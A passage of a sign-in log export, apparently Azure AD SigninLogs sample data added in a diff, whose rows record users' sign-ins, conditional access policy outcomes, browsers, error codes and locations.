'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c95450b3-582d-4306-9dd2-9bda8c321500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bda8c321500,SigninLogs,Sucess,33.7984581,-84.38828278
+1068,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,a45ae61e-b3cc-49a3-8281-f830d87ae137,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48cf7de2-e659-4e20-aee0-25dc58dc1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,48cf7de2-e659-4e20-aee0-25dc58dc1400,SigninLogs,Failed,33.7984581,-84.38828278
+1069,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,faaa42c8-6dee-4716-b5a0-f51293f66ad7,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",db9d2eaf-e3fe-45a9-85f6-9cca060e1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,db9d2eaf-e3fe-45a9-85f6-9cca060e1300,SigninLogs,Sucess,50.6406517,5.572050095
+1070,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0bce469f-e02f-0000-54e6-7d031fbb3810,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a26533b1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d3a3c86e-d6a1-4323-9bc0-1a26533b1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1071,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:31.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,09cd469f-b017-0000-5421-761e16eceeaf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f620f11500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f620f11500,SigninLogs,Sucess,41.90428925,-85.99833679
+1072,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:35.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f8bbafe-5139-4f8a-9453-ebff118e1ba2,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6849a433-22b7-4af4-99c8-beee5f4e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,6849a433-22b7-4af4-99c8-beee5f4e1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1073,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:23.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5f6c9e20-6d16-4146-b72e-f90376fd5b2d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f6347c1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f6347c1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1074,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:18.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,133deccc-7541-4eda-8abe-ed03d6472e6e,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a260d3d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d3a3c86e-d6a1-4323-9bc0-1a260d3d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1075,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,fecc469f-a03c-0000-4780-af43648aaff5,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c8ea9bc1-b11e-4423-93a8-17c0d1801400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c8ea9bc1-b11e-4423-93a8-17c0d1801400,SigninLogs,Failed,41.90428925,-85.99833679
+1076,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f11228cf-ac22-48a9-90be-407bb8cdf2f8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d438c1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 